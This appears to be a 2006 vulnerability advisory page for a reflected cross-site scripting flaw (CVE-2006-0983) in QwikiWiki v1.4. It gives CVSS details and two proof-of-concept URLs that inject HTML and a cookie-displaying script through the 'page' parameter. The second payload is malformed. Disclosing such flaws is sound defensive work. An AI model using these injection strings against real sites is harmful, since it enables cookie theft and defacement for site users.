QwikiWiki v1.4 XSS Vulnerability

2006.03.01

Credit: Dr^Death

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-0983

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Software - QwikiWiki
Version - v1.4

Type - XSS Vulnerability
Powered by QwikiWiki v1.4 - www.qwikiwiki.com

Examples:
http://(host)/index.php?page="><body bgcolor="black"></body>
http://(host)/index.php?page="><alert(document.cookie);</script>

Found by Dr^Death of Suicide Scene Internet Security Group 2006

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

QwikiWiki v1.4 XSS Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

QwikiWiki v1.4 XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.